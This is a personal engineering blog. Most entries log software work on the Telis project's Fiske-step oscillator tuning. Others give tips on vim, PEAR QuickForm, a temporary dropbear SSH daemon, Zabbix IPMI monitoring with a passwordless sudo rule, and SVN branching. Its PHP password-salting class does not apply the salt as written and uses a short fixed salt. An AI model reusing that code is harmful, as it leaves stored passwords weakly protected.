If you're root, just edit this file, search for the line:

 syn keyword       cTodo       contained TODO FIXME XXX

and add WTF at the end of the line.

If you're a mere mortal user, copy this file to your .vimrc directory in your homedir and give it a name such as my_c.vim. Then edit the file as described above and add the following lines to your $HOME/.vimrc file:

 au BufRead,BufNewFile *.c set filetype=myc
 au! Syntax myc source $HOME/myc.vim

2008-01-30 Fiske scan analysis

I've written an analysis routine to see how the results of a particular Fiske "scan" hold up. Such a scan means: set a particular FFO current and an FFO countrol line current, then stepwise increment that last one while measuring the FFO voltage. A scan results, meaning a bunch of voltages. In such a scan, certain areas would never contain values -- search this blog for Fiske steps for more information.

I wanted to visually check the analysis of the routine. A scan can have a lot of outcomes. Say we want to find value 0.863. We'd then do a scan where we're aiming for a resulting voltage between 0.858 and 0.868. Some possible situations that could come out:

 1)    ---*-*-*-*-*-*-*-*-*--   Very nice step found
 2)    -*-*---------*-*-*-*-*   Found two steps, at the right is biggest
 3)    -*-*-*-*-*--------*-*-   Found two steps, at the left is biggest
 4)    **-*---------------*-*   Found two steps but they're both too small
 5)    ----------------------   No (or not enough) points found at all
 6)    --*-*-*-*-*-----------   One step found, but it's not nicely balanced

I've retrieved some test values and the scan results (without the FFO plot behind it) look as follows. The X axis displays the FFO voltage in mV. Note that the Y axis is a simple counter in this case, and is meaningless. It's also in reverse: the lower the value on the Y axis, the more recent the results on the X axis. The black line is the value that we're aiming at.

fiske scan 1.png

The first couple of lines (starting at the top) show the results of the setup phase of the Fiske macro. These can be ignored; they're not used for analysis.

Let's zoom in on the first lines (i.e. where the Y axis shows '42').

fiske scan 1 zoomed.png

We're looking for a line that's nicely centered around value 0.863 mV.

We can say the following things about the first bunch of lines below the setup lines:

  • They all contain enough points, enough so we can analyze them
  • They're all right in the middle between two "rows of points"
    Since we need a row where we have a bunch of points that's centered around our value of 0.863, so from 42 to 28, these rows are all useless.

Now what does the analysis routine say?

 Line 46 gives result: Last scan contained only 7 points
 Line 45 gives result: Last scan contained only 4 points
 Line 44 gives result: Last scan contained only 4 points
 Line 43 gives result: Last scan contained only 4 points
 Line 42 gives result: Last scan contained only 4 points
 Line 41 gives result: Last result had a skewed result set
 Line 40 gives result: Last result had a skewed result set
 Line 39 gives result: Last result had a skewed result set
 Line 38 gives result: Last result had a skewed result set
 Line 37 gives result: Last result had a skewed result set
 Line 36 gives result: Last result had a skewed result set
 Line 35 gives result: Last result had a skewed result set
 Line 34 gives result: Good result found
 Line 33 gives result: Good result found
 Line 32 gives result: Last scan contained only 6 points
 Line 31 gives result: Last scan contained only 4 points
 Line 30 gives result: Last scan contained only 6 points
 Line 29 gives result: Last result had a skewed result set
 Line 28 gives result: Last result had a skewed result set

Obviously the procedure thinks that lines 34 and 33 have a pretty good result, which is not the case.

After writing an analysis routine, the following output is shown:

 Line 37 gives result: Last result had a skewed result set
 Line 36 gives result: Last result had a skewed result set
 Line 35 gives result: Last result had a skewed result set
 Line 34 gives result: Last result had a skewed result set
 Line 33 gives result: Last result had a skewed result set
 Line 32 gives result: Last scan contained only 6 points
 Line 31 gives result: Last scan contained only 4 points
 Line 30 gives result: Last scan contained only 6 points
 Line 29 gives result: Last result had a skewed result set
 Line 28 gives result: Last result had a skewed result set
 Line 27 gives result: Last result had a skewed result set
 Line 26 gives result: Last result had a skewed result set
 Line 25 gives result: Last result had a skewed result set
 Line 24 gives result: Last result had a skewed result set
 Line 23 gives result: Good result found
 Line 22 gives result: Good result found
 Line 21 gives result: Last result had a skewed result set
 Line 20 gives result: Last result had a skewed result set
 Line 19 gives result: Last result had a skewed result set
 Line 18 gives result: Last result had a skewed result set

Still not OK. What's wrong here is that first the subroutine for a skewed result set is run. Then after that's successful, the detection needs to be added to see whether a set covers the target X value.

2008-01-02 Fiske results

Finally some visual results from the Fiske step routine.

fiske results1.png

This image shows the FFO as it's always drawn: bias current on the Y axis and resulting measured voltage on the X axis. The color displayed is the voltage on the SIS junction.

The blue lines are the scans as executed by the Fiske macro. As a reminder, such a macro is a list of commands for the FPGA on the electronics boards. The Fiske macro keeps the FFO bias on a single value, while the FFO control line is stepped up. As can be seen, the control isn't very regulated; the blue lines shift a little at the left and right edge. Well, actually it shifts more than a 'little'. The left is completely off :-)

To fix this, the starting point (the most left point) of each scan should be in line with the previous scan. The first point that's just over Vstart (see previous entries) is probably very nice.

What's happening now is that the procedure tries to find a good point in the scan part of the macro -- when actually a good point could reside in the find up part of the macro. So this problem is fixed by searching in that first find up part as well.

Note that currently, an analysis is run on each line. Normally, the scan would be stopped since the analysis was positive. This is the case when the blue line sees that it's right inside a cloud of points, where reading out the PLL IF voltage reports 0.4 V and higher). However, my Russian colleague gave the advice to let it run somewhat and see whether the analysis can be better.

2007-11-28 Testing optimization

After running the Fiske macro for the setup part, we have a nice value for the FFO Control Line (CL) current. Funny enough when we use this value, the macro immediately returns, saying that setting this CL will make the FFO voltage higher than requested.

Thinking about it, this can either be a measurement error or something else. I tried to rule out measurement error by running the 'measure offsets' routine.

Later, I found out several things. Firstly, the FFO bias and CL weren't set to 0 before attempting to run the Fiske macro. This is important because otherwise with a second scan we would get different results. This turned out to be the culprit.

The next problem was that the macro reported not being able to find the FFO voltage start. After checking the output of the macro, I found this funny: the macro reported that it tried to use the previously found settings.

In other words: the previous run found a certain voltage when setting FFO bias and CL. Trying again with a slightly lower FFO bias and it fails -- while the physics tell me this shouldn't happen.

I tried upping the Find Step Up value, but this didn't help. After discussion and a cup of coffee, it turns out that I wasn't making the same settings at all: the FFO start voltage in setup step 2 is NOT the same as the FFO start voltage in setup step 1...

When that was done, I still found out that the macro returned value 1.0237 as the first result, while I had put the limit at 1.0231. It was besides the point, but I needed much more values so I made the FFO CL scan step not 40 times bigger than normal scan, but 10 times. This resulted in not 13 pairs (of FFO voltage/CL current) to choose from, but up to 32. This again was pushing the limits of themacro, since the macro is limited to 32 and if it hits that limit, it'll return an error code. So I switched it back to 20 times which seems enough for now.

Still I encountered the following:

FFO CL FFO Bias Resulting FFO voltage
40.1725330x058B
40.172532.90x597

So: setting the same FFO CL but a different lower FFO bias resulted in a higher FFO voltage! That's physically not possible so something had to be going on here. After adding debugging,... the problem disappears. This is good for speed, but not so for understanding.

The next problem seems to be that the macro output is misinterpreted; there's a different code for getting the right FFO voltage: with stepping up and without. That last situation means: the first FFO bias/control line we set, immediately results in a good voltage. I didn't account for that.

The macro now had the problem that after a number of succesful scans with not enough points, results came up where the Vstart couldn't be found. A programming error caused the FFO bias to be constant, when it actually should be lowered with a small step. After fixing that, it turned out that the current stepsize wasn't good enough either. This is because if you keep the FFO CL the same, but you lower the FFO bias, you get a slightly lower FFO voltage as a result. Thus with each FFO bias step down, the stepsize should be increased to find the FFO Vstart again.

That stepsize for the FFO CL is 0.02 mA. This amount covers a resulting range from Vzero to Vstart of roughly 0.8 mV. (The point Vzero is the FFO voltage that results from setting the last measured FFO CL). Each decrease of the FFO Bias causes a decrease in Vzero that is on average 0.001236 mV. The area thus increases with 0.1235 percent. Equally the stepsize should be increased with this percentage as well. Alternatively, we increase the number of steps that the macro does -- but since that makes the routine slower, I prefer the former solution.

After making the changes, the routine still can't find Vstart after a couple of FFO bias decrements. Analyzing the area that's covered from Vzero to Vstart, but this time in raw values, it seems that it increases by about 3 bitsteps every FFO Bias decrement. This is a lot since the actual area between Vstart and Vstop is only 3 bitsteps in and of itself! Since it's all too easy to make the step up size so large it passes over Vstop, I increase the maximum number of steps in the macro. It's now 32 and I increase it to 128.

The first test I run, this number becomes irrelevant. The procedure bumps into two Fiske steps. The first is bridged by the increasing FFO CL, the second isn't. The macro thus returns that the scan steps are too small, when in actuality, we just can't cross the gap over the second Fiske step and thus the target Vstop is never reached. Should we increase the scan step? I don't think so -- that'll make the macro give less results between Vstart and Vstop. Should we increase the number of scan steps? I don't think so either -- it's not a goal in itself to get to Vstop.

The answer lies in the analysis: the result of the macro should be returned not as an error. This is a situation where there's enough data and we should analyze it instead. However, this could also be an error situation when we're in the first scan after the setup.

After fixing this came the case where a programming error kept causing the analysis to fail and say that every detected point was to the left. Then another where the voltage range around the center was a factor of ten too small.

What's still happening is that with every FFO bias decrement, the Vzero-Vstart range gets larger and larger. The FFO CL needs to be looked at, something like where the previous nice value is copied and passed to the macro.

2007-11-19 Finding an optimum

As mentioned before, we need an algorithm to find the correct setting in a cloud of points.

I've gotten an explanation on how Andrey (the software developer of the Russian team) does this and I've tried to describe it using our macro, which should be faster in flight.

What does their routine do? It takes the FFO voltage upper and lower limit as well as a FFO bias current and FFO control line (CL) current. The routine then starts. It's divided in two parts:

  • Initial setup to find the correct setting of the FFO bias and control line that results in an FFO voltage between the limits, let's call these (FFO) Vmin and Vmax
  • Further fine-tuning that lowers the FFO bias and does a new FFO CL sweep in order to avoid the Fiske steps

The main thing to remember for the initial setup is that if you set the FFO bias current and CL current, you don't know the resulting FFO voltage. You'll have to measure it back to know how you're doing. The main thing to remember for the fine-tuning is that we want to find an FFO bias and CL current that result in an FFO voltage that's right between Fiske steps since the sensor is less sensitive to temperature changes.

For the first part, it lowers Vmin by ten percent. The FFO bias current is then set and the FFO CL is swept, each time reading back the FFO bias voltage. If the bias voltage falls between Vmin and Vmax or maybe somewhat over them, the bias current has a good value. If however the voltage "jumps", i.e. a value is read back that is outside Vmax, the sweep is stopped and has failed. These jumps occur, because above a certain point in the I/V curve for that particular FFO, the current has a wildly different voltage as a result.

Upon failure, which is quite likely the first couple of sweeps, the FFO bias is set lower and a new sweep is started. When success occurs, the fine-tuning starts.

When fine-tuning starts, we know the FFO bias current to set, as well as the FFO CL lower and upper limit which results in the FFO voltage Vmin and Vmax. What is done now, is request, say, 8 points in this space and then see if the gap between these points is so big that we can safely say that it's a Fiske step. If so, the FFO bias current is lowered and another sweep is done.

Below is a screenshot (actually a photo) of Irtecon, Andrey's implementation:
irtecon fiske steps.jpg

Now on to our own problem; recreating the above with our macro.

The macro basically sets the FFO bias current and then sweeps over the FFO CL current. It'll read out the FFO voltage with each step of the sweep. Given Vmin and Vmax, it will bail out of the FFO voltage isn't between the limits. I thought I could just pass 0x0000 and 0xFFFF as the limits, so these won't be checked and just return all values. But alas, that won't work. During the macro its setup part, it'll try to make small steps to the Vmin, and it'll bail out as well if it's not reached. However when found, a sweep is made.

With the macros we could reproduce the same two phases that were explained above. We'll start with the user giving the example parameters.

  • Set the frequency out of which follows the FFO voltage Vmin and Vmax
  • Set the minimum and maximum FFO bias
  • Set the minimum and maximum FFO Control Line
    The macro also has a couple of values which we'll fill in for ourselves:
  • Stepsize-up that's used to initially get between Vmin/Vmax
  • Stepsize-down that's used to find Vmin
  • Stepsize-scan that's used to completely cover the area between Vmin/Vmax

For the initial setup, using the macro should be something as follows:

  • Set the FFO Vmin to 0 and upper limit to user setting
  • Set the maximum FFO bias and minimum FFO CL (with the FFO bias, we work our way down from the top)
  • For stepsize-up, use 0.1 mA; it doesn't matter what's entered here as long as it's a fraction of the FFO Vmax
  • For stepsize-down, we'll use a fifth of the stepsize-up. With this value, a couple of steps are taken until the macro will reach the Vmin.
  • Then the stepsize-scan is set to Vmax divided by 20.
    This way, the macro will return about twenty values. We can then refine Vmin and thus get closer to the user-defined limits.

The macro can return nine result codes of which two are actually successful. The first few times, I got a 0 which means that the FFO CL setting is below FFO bias.

For the fine-tuning:

  • TBD

To debug, we need good visualization. This isn't good enough for this particular purpose, though. We can draw a plot and then redraw it, including the results of the macro. What we can't do, is clear out the macro results and begin again with the original plot. So that's on the to do list as well.

2007-11-15 diff tools

Previously, I've written about the diff tool meld, a very nice diff tool.

However, meld requires a graphical environment and this isn't always available. Vim however, is pretty much always available and has a diff tool built-in.

Just start vim as follows:

  $ vimdiff file1 file2

Screenshot:

vimdiff2.png

Visually it's pretty self-explanatory. Red parts are not in the other file, blue ones are empty parts where the other file has a red part. What you probably want to know, is how to quickly shift differences between the files.

dp The difference is pushed to other file. This is valid when the cursor is on a red part.
do difference is obtained from another file. Use in a blue part.

There are many options, check out the vim documentation on diff mode.

2007-10-27 Thinking about wizards

In the previous post, I talked about how I was coding up a wizard-type bunch of screens, and was using the MVC pattern here as implemented by PEARs HTML_QuickForm_Controller class. Each screen basically has three actions: 'display screen', 'previous screen' and 'next screen'. The last screen has the action 'finish'.

You have to be careful with this approach; the number of actions probably isn't limited to these at all. Consider the following example:

  1. In screen 1, the user must make a choice: do you want apples or bananas? User chooses apples.
  2. In screen 2, the number of apples is calculated and displayed. This took 20 seconds. Then the user chooses the percentage of the apples.
  3. In screen 3, the user must choose how the delivery is made.

Suppose the user goes back from three to two. The 'display' action is called and, using the choice from the first screen, the number of apples is recalculated. But that's not what the user wants; he just wishes to change the percentage of apples.

So what we need is an action that's derived from 'next', let's call it 'calculate'. This action then checks whether there was a previous choice, whether this differs from the current choice and if so, does a new calculation. The result is saved in the session. We then do whatever 'next' normally does.

2007-10-26 PEARs HTML QuickForm Controller goodness

I'm in the middle of coding up a multi-page wizard-style bunch of PHP pages. The MVC pattern is implicit herein. It looked like it'd be useful to use the PEAR class HTML_QuickForm_Controller. In combination with HTML_QuickForm for the model, this is a pretty powerful business. As the view, the PEAR package HTML_Template_IT is used.

However, it turns out that debugging can be quite painful. Because the controller and the view part are so loosely coupled, it can be troublesome when it doesn't work.

I defined the 'cancel' action besides the default stuff like 'previous' and 'next'. The related class that should be called when the button was pressed, cleared all values from the session.

The cancel button didn't work; instead it just submitted and the controller served up the next step in the wizard. The difference turned out to be as follows:

  $submit[] =& $this->createElement('submit',
      $this->getButtonName('cancel'), "Cancel");    
  $submit[] =& $this->createElement('submit',
      $this->getButtonName('next'), t('Next'));
  $this->addGroup($submit, "submit");

That last line should be:

  $this->addGroup($submit, 'submit', '', '&nbsp;', false);

It's really about that last parameter, the false boolean. This generates a button with name _qf_domregform_cancel instead of submit[_qf_domregform_cancel]. Why the controller interprets this differently, I don't know.

But I do know it took a lot of time to find the culprit. Basically what I did, was take the example code, and adapt one page step-by-step to the page that I coded for the website.

That's not my idea of debugging, but I'm not sure how else the bug could've been narrowed down.

Here's another one. In my wizard, the third step is to choose how DNS is set up. It's a radio button that lets the user choose between 'standard' and 'advanced'. My first attempt looked like this:

 $dns1 =  new HTML_QuickForm_radio(null, 's', 'Standard');
 $dns2 = new HTML_QuickForm_radio(null, 'a', 'Advanced');
 $this->addGroup(array($dns1, $dns2), 'DNS_server', "Choose setting for DNS server");

The problem with the above code is that it doesn't remember its setting when the user goes back from step four to step three. The code below will correctly do this:

 $radio[] = &$this->createElement('radio', null, null, 's', 'Standard');
 $radio[] = &$this->createElement('radio', null, null, 'a', 'Advanced');
 $this->addGroup($radio, 'DNS_server', "Choose setting for DNS server");

Now what is the difference? It can't be seen in the HTML source, so I looked at the PHP code but I couldn't see the difference in the five minutes I checked.

My point to all this is that there is more than one way to do the job, but if it's not the correct one, it silently fails without any message.

That makes a developer's job harder.

2007-09-26 Fiske steps testing

We did some testing of the new Fiske step software yesterday. To see how the device (the SIR chip) behaves, we first ran a plot where we set the FFO bias current and read out the FFO bias voltage.

Some plots of an area with Fiske steps, where the Y axis is the FFO bias current and the X axis is the FFO voltage:

fiske1.png

If we make a much finer scan, it looks like this:

fiske2.png

What is basically seen, is a cloud of points that is formed by setting the bias current on the FFO and then reading out the voltage. Each line means a different current setting on the FFO control line (FFO CL). (For an explanation of the SIR including FFO control line, see entry 2006-04-24 SIRs for dummies).

Note that we've scanned for a limited number of control lines.

Now if we want to have the FFO beam at a certain frequency, we calculate which voltage we need by dividing the frequency with the Josephson constant. To make it easy to understand, say we want to find a Fiske step at 0.7 mV.

Some research was done by the Russian researchers and what came out is that the procedure to find a good Fiske step must be done by setting the FFO bias, then proceding to increase the FFO CL. If no good Fiske step is found, the FFO bias must be lowered, and again, the FFO CL must be reset and increased again until a certain point.

So there are two loops going on; we loop the FFO CL from high to low and get a bunch of value pairs -- FFO bias voltage and FFO CL current. For each loop, we lower the FFO bias current. Basically, you get a horizontal cut from the plots seen above.

You could just follow the lines that are drawn above, which connect one FFO CL setting. If you would do that, you'd get results with the same FFO CL setting. This migh seem logical when looking at the plots above, however, we follow the advice of the Russian team on this point.

Let's see if we can find some numbers that a Fiske step procedure should use. I've graphically extrapolated picture 1 as follows:

fiske3.png

The blue lines are extrapolated clouds of points. The green line is a possible combination of FFO bias current and FFO voltage. The fat green line could be a possible scan area where we want to find a good Fiske step.

What you can see is that if you start looking at 32 mA for a good Fiske step, you will keep scanning down until you hit 27 mA. If you had begun at 32.5 mA, you would immediately have hit a good point. Scans should thus cover at least 5.5 mA.

However, there's another input we must keep track of: the setting of the FFO control line. I haven't displayed the plot here, but for each milliampere change in the FFO bias, we upped the FFO CL 1.2 mA.

Right, so how do we know we should stop the Fiske step procedure? Then we'll have to look at the second plot again and see how wide those clouds are. Roughly it looks like it's 2.5 uV (yeah that's microvolts) wide. If we do a sweep of at least 10 settings on the FFO CL current where we make sure we have a result of the FFO voltage with a width of 5 uV, we can see if the points that come out are centered around the target voltage (e.g. frequency).

Some questions remain:

  1. Is our measurement accuracy good enough for getting results with a width of a couple of hunderd nanovolts? What FFO CL current do we scan with in that case? Is our DAC accurate enough to set that current?
  2. Is that FFO CL increment of 1.2 mA (each "outer loop" of the scan) a good idea? Why not more or less? How is this influenced during flight?
  3. Should we read out the SIS voltage and compare it with its optimum?
  4. How many uA must the FFO CL be increased to measure -- within 10 uV -- a number of ten points? (The points being FFO bias voltage measurements.)

Those questions might be answered as follows:

  1. This is device-dependent and must be characterized by making FFO plots and seeing at which FFO CL the SIS mixer has the correct voltage.
  2. The SIS mixer has one optimum voltage which can be seen by pulling a SIS plot. There already is a routine which optimizes the FFO control line and we need to think about how this relates to the Fiske step procedure.

2007-08-20 Configuring SSH daemon

If you want to configure the SSH daemon on a remote machine, you probably don't want to risk the chance of locking yourself out. Nowadays, properly configured machines can restart the SSH daemon while retaining the running connections. That's great, but if you don't want to rely on that, read on.

We want start a separate, temporary SSH daemon. Dropbear is great for that. We will do enough to run a temporary copy for the duration of configuring the regular SSH daemon installation. We won't install Dropbear permanently.

Download the latest release on the remote machine. In a user account, unpack, compile and make it:

  remoteserver$ tar xfz dropbear-0.50.tar.gz
  remoteserver$ cd dropbear-0.50
  remoteserver$ ./configure
  remoteserver$ make

Now generate a key for the server:

  remoteserver$ ./dropbearkey -t rsa -f key.rsa

The server can be started and we'll use some high port so as not to get in the way of other services. Port 31337 is used below:

  remoteserver$ sudo ./dropbear -p 31337 -r ./key.rsa

From your local machine, you should now be able to reach the server:

  localmachine$ ssh -p 31337 remoteserver

Log in and configure the regularly installed SSH daemon. Restart it, do whatever you like. When you're done, exit and log in again as you'd normally do (i.e. not using the dropbear server but the regularly installed SSH server). If all is successful, kill the dropbear server and wipe out the temporarily compiled copy:

  remoteserver$ sudo killall dropbear
  remoteserver$ rm -rf dropbear-0.50

Note: it's not necessary to start dropbear with sudo. However, dropbear then can't read the root-only files for successful authentication. The only authentication possible is key-based, with a key in ~/.ssh.

2007-08-09 Fiske steps

I've previously explained the SIR chip, so I'll keep it short and say that currently, we're implementing a procedure to automate the setting of the frequency with which the FFO (Flux flow oscillator) beams.

This frequency is determined by the voltage that's set on the FFO. If you multiply that voltage with the Josephson constant (483 597.9 * 10^9 Hz V^-1), you get the frequency.

But we can't set that voltage straight away. We first set the FFO current. We then measure the resulting voltage to see if we're on the right way.

There are two circumstances here. We have on the one hand a Josephson junction (a special superconducting circuit); the SIR chip its temperature is brought to about 2 Kelvin. On the other hand, a magnetic field envelops the FFO. That is due to the control line. This is a conducting line which is etched below the FFO on the SIR chip. When we set a current on the FFO, a magnetic field results.

When you combine these two circumstances at a certain FFO bias voltage (and thus a certain frequency), Fiske steps can occur. From what I've gathered so far, a Fiske step is a certain voltage range that cannot occur when you set a certain current and a certain magnetic flux on a circuit. 1)

So my electronics colleague created a macro, which is a list of instructions for the Telis FPGA. This procedure does the following:

  1. Determine which frequency we need; using Josephson constant, determine FFO voltage
  2. Establish a lower and an upper boundary voltage in which we will search
  3. Set the FFO control line current
  4. Set FFO current
  5. Read FFO voltage
  6. Compare readout with the wanted FFO voltage
  7. If it's too big: quit
  8. Start lower boundary loop (see below)
  9. Decrease FFO current in small steps, reading out FFO voltage; we probably skipped the lower boundary and want to get close to it
  10. Start upper boundary loop (see below)

Lower boundary loop:

  1. Increase FFO current in large steps
  2. Read back FFO voltage
  3. Continue until we've passed the lower boundary

Upper boundary loop:

  1. Increase FFO current in small steps
  2. Read back FFO voltage
  3. Continue until we've passed the upper boundary

We now have a set of points. These must be looked at to see whether we need to choose a new value for the FFO control line and whether the procedure must be started again.

Below is the output of the oscilloscope, where the X-axis displays time and the Y-axis displays the FFO voltage. This is a test situation where a simple resistance is used instead of the FFO.

FISKE Steps test 01 small.jpg

Larger picture

Footnotes:
1) Problematic in this case is that there is some hysteresis. If you lower the FFO control line, other Fiske steps occur. If you raise it again to the previous level, the Fiske steps are not the same anymore. So you'll have to steadily work your way down, assessing the merits of each control line setting and stopping when you think you've reached a correct setting.

2007-08-05 Adding salt to Auth class

If you're using PHP, you probably use or at least know of the PEAR classes at http://pear.php.net/. It's a pretty large set of classes providing lots of standard functionality. Amongst these is the Auth class, which gives you perfect start if you need username/password screens for your application. What this class is missing, is a function for adding salt to passwords. Use the simple class below to add this.

 <?php
 include_once 'Auth.php';
 include_once 'config.php';
 class MyAuth extends Auth
 {
     function assignData()
     {
         parent::assignData();
         $this->password = $mysalt . $this->password;
     }
 }
 
 ?>

Save the above code in a file called MyAuth.php and instead of including Auth in your login script, use MyAuth. Also create a file called config.php and add the variable $mysalt. It should contain two or three characters, something like:

 $mysalt = 'wd3';

This should be concatenated before all passwords when saving them in the database. This code is public domain.

To understand the usefulness of salt, see Wikipedia's entry on password salt.

2007-06-22 Configuring ZABBIX and IPMI

Recently I installed RedHat AS 5 on a PowerEdge 860. For management, we use Zabbix; if you know Nagios then remember that this is supposed to be a more user-friendly replacement. I figured out how to configure Zabbix toread out fan speed, board temperature, etc.

To read out IPMI sensor values with Zabbix (http://www.zabbix.org/) take the following steps:

On the zabbix server, use the web frontend (menu Configuration -> Items) to create a new item "ipmi.planar_temp" of type "ZABBIX Agent (Active)". Type of value is Numeric, unit is C for Celsius.

Go to the zabbix agent machine. Give the zabbix sudo rights (as root, execute "visudo") to execute the ipmitool as root, without a passsword.

Example line to add:

 zabbix ALL=(ALL) NOPASSWD: /usr/bin/ipmitool sdr

Edit the /etc/zabbix/zabbix_agentd.conf file and add the line (this is one straight line):

 UserParameter=ipmi.planar_temp,sudo ipmitool sdr | grep "Planar Temp" | awk '{print $4}'

Restart the agent:

 # service zabbix_agentd restart

Go to the zabbix server. Restart it (don't know if this is necessary):

 # service zabbix_server restart

Go to the zabbix server web frontend, menu Monitoring -> Latest Data.
Scroll down. The following line should be shown after a minute or so:

 ipmi.planar_temp        22 Jun 08:19:25        26 C

At the end of the line, there's a hyperlink to a pretty stripchart.

You can add new lines as you wish; repeating the steps above. The PE360 doesn't show a whole lot of IPMI information. For interested parties, here is my zabbix_agentd.conf which is a text file:

[zabbix_agentd.conf]

Note that last line. Basically I count all lines that do NOT end in either 'ok' or 'ns'.

Also note that this is a test setup. The sudo construction could be tighter.

2007-03-12 Better measurement

In the previous entry, I talked about correcting offsets when measuring with the FFO board. We've also made an improvement in the measurement itself. The ADC has lots of options for measuring, amongst them one that takes more time to do measurements. The ADC always takes multiple measurements and then takes the mean (this might be a bit simplified). When taking more time, this results in more measurements taken and a more reliable mean measurement. When plotted, the difference was really noticeable:

better res.png

The jagged line is the fast measurement mode, the smooth line is the mode where more time is taken. It's a tradeoff naturally.

2007-03-11 Bug in software or hardware

This week was a very rewarding week: we squashed a bug which seemed to elude the very best minds -- these of the Telis team.

The problem was that when measuring a voltage, we read out the wrong value. We're reading very accurately, in the microvolt (uV) scale and this is done with an electronics board which incorporates an ADC. When we made sure that no current was running on the measured circuit, we tried to measure zero but we actually got -14 uV. On this scale that isn't something to worry about; besides the ADC there are more electronic components on the board and these can all account for a slight offset. Hell, on this scale even the temperature can play a role.

However, this ADC has a lot of options and one of them is a procedure to measure an offset and store it in a register. Further reads will then take this offset into account. The electronics guy had created a script for this purpose. I had incorporated the script into a nice Perl module with a button in the user interface named 'Measure Offsets'. I've previously described this procedure in 2006-10-20 Measuring FFO offsets.

So, we ran the procedure and did a new measurement. The offset changed, but didn't disappear. Hmm, strange. Now we measured -7 uV. Weird!

FFO plot offset correctie zichtbaar.png

First we tried the usual stuff, to make sure this faulty reading was repeatable. Turn off electronics, disconnect cables, reconnect, turn on again. Trying an older version of the software. Completely reproducible. Then it became time to start thinking.

We tried to determine the location of the problem. Is it the hardware, the software, or the hardware instructions loaded into the flash located on the electronics board?

The measurement is run from the FFO board:

FFO-pll top.jpg

Our electronics guy tried the spare FFO board. Fully reproducible faulty behavior. So, it's not the hardware. Then it must be the software, right?

We reran the old script from which the Measure Offsets Perl module was created. This script ran the offset procedure for the ADC and then did some measurements. These checked out fine, printing zero uV after the offset procedure. However, if we then walked to the main software screen and read out the value, it had the -7 uV offset again. Can we rule out the software then?

We compared the Perl module and the original script line by line. These were the same. We also checked what each line did. They were created some time ago and we wanted to make sure everything still made sense.

Then we realized that there was a difference between a readout in the original Measure Offsets script and a readout in the main software screen. The second one uses a macro, the hardware instructions loaded into the flash located on the electronics board. This macro first puts the ADC in a high resolution before making the measurement.

So we changed the Measure Offsets procedure to first set the ADC in a high resolution before doing the offset procedure. Then we reran the measurement and waited with fingers crossed.... and Bingo! That was the problem. When we reran the plot, the following picture appeared:

offset fixed.jpg

The line left is the measurement before we ran the offsets procedure. The line at the right is the corrected measurement. (Note that the lines aren't as jagged as the first plot -- that is because the ADC was set to a higher accuracy, which takes more time for the measurement.)

Turns out it wasn't a hardware problem. It wasn't a software problem, either. It even wasn't really a problem in the macros. We just didn't use the offset options of the ADC in the right way. It was fully tested, but not in the exact same way measurements were taken later.

This type of bug had evaded unit testing and was only be caught with good testing in the field. Can't beat that kind of testing.

2007-02-02 Branching in SVN with existing work

This week I had the situation where I was asked to come to another office (in Groningen) and do some testing and fixing of the software. The revision running there was revision 590, while I was in the middle of an integration effort, going up to release 605. I couldn't bring the current broken code, but some work needed to be done at the Groningen office, with revision 590.

(Note: we usually install a revision including source and build it on the spot, so the revision 590 source was present in Groningen office).

So, I went there and did some testing, fixing problems, etc. When I came back, bringing the source with me, I had the situation where you started to hack and decided afterwards that creating a new branch would've been a good idea. To do this, first you'll want to create a patch of all your changes:

  $ cd your/current/project/directory
  $ svn diff > ~/hackwork.patch

Then find out what revision you are hacking:

  $ svnversion .
  590M

Now create a separate branch of the original version:

  $ svn copy http://subversion.company.com/svn/telis/tuce \
    http://subversion.company.com/svn/telis/tuce-branch-gron \
    -m "Creating separate branch for work outside integration efforts"
  Committed revision 606.

Go to another directory, in my case ~/workspace

  $ cd ~/workspace
  $ svn co http://subversion/svn/telis/tuce-branch-gron
  $ cd tuce-branch-gron

And now integrate your changes again, and commit them in the branch:

  $ patch -p 0 < ~/gron.patch
  patching file tdb/mysql-telis.sql
  patching file client/python/plotffo.py
  ... lines removed ...
  $ svn commit -m "Fixes made on colors in FFO plot, conversion housekeeping \
  macro different, conversion FFO plot corrected"
  Sending        client/perl/lib/FFO_sweep_macro.pm
  Sending        client/perl/lib/PLL_sweep_macro.pm
  ... lines removed ...
  Sending        tdb/mysql-telis.sql
  Transmitting file data ...............
  Committed revision 609.

Voilà, a separate branch is created.

2007-01-09 Battery problem

One of the current problems in the current project is the battery pack. According to the electronics man, it's a small problem, but he explained as follows: the battery pack consists of a bunch of lithium-ion non-rechargeable batteries, custom made by an American company. The batteries come with a specification that they deliver up to a certain voltage for a certain temperature. The spec sheet shows a curve; the lower the temperature, the lower the voltage. At room temperature the batteries give around 3.8 V but the Telis electronics have to operate on a balloon. The balloon its trajectory will take it in the atmosphere where temperatures can occur between -19 and -70 degrees Celsius.

This is a much broader range than what's usual for electronics on a satellite. Once these are packed in isolation, the temperature range is quite small.

The problem is now that tests show that the batteries don't deliver up to spec for temperatures around -40 degrees Celsius and possibly lower. The electronics man thought up one solution, which would involves a separate battery pack. Together with a temperature sensor in a control loop, the second pack makes certain that the main battery pack (feeding the electronics) is kept at the right temperature. It must be checked now that there is enough room above the electronics casing in the frame that's carried by the balloon.

2006-12-07 Electronics interface for Telis

When I want to read out the settings from the electronics boards of the Telis project, I have multiple choices.

  • First is to just query one parameter
  • Next is to run one of the so-called housekeeping macros which basically lets the FPGA query a bunch of parameters and return the results in one big chunk
  • Third is to query a special virtual setting

That last option actually involves querying the "func" board. This board has ID number 0. It's loaded into the server upon startup and actually runs some Perl code that's defined in the database. The Perl code mostly just maps straight through to settings on other boards, however, this can be used to create a simple interface to the more involved settings.

It's a very flexible setup to control a piece of custom hardware.

What's a bit of a shame is that there are some settings which actually need to be combined. All settings are 16 bits. However, one ADC returns 20-bit values and these need to be retrieved using two settings.

The database with parameters however, maps one-to-one. So, we work around this using a parameter on the "func" board. You query the func parameter, which runs some Perl to actually query two parameters, combines them and returns the result.

2006-11-16 Checking form fields

When you're creating dynamic web pages with forms on them, you'll probably not forget to validate the values that the user sent in a text box. Will you check which values come in from a selection box?

You probably wouldn't. After all, the user can't edit the values. Novell certainly doesn't. Novell has a piece of software called Webmail, so users can read their mail using their favorite browser instead of the Novell client.

That's useful. Using Webmail, users can also define server side e-mail rules, for instance to automatically move incoming e-mails from an mailing list to a specific folder. Most mailinglists put a specific piece of text in the subject, but others can be recognized by the e-mail address of the list, which is in the To: or CC: field.

create rule novell webaccess.png

Except... with webmail, the only fields you can enter, are the "From", "To", "Subject" and "Message" (body) fields. This is a non-editable select box.

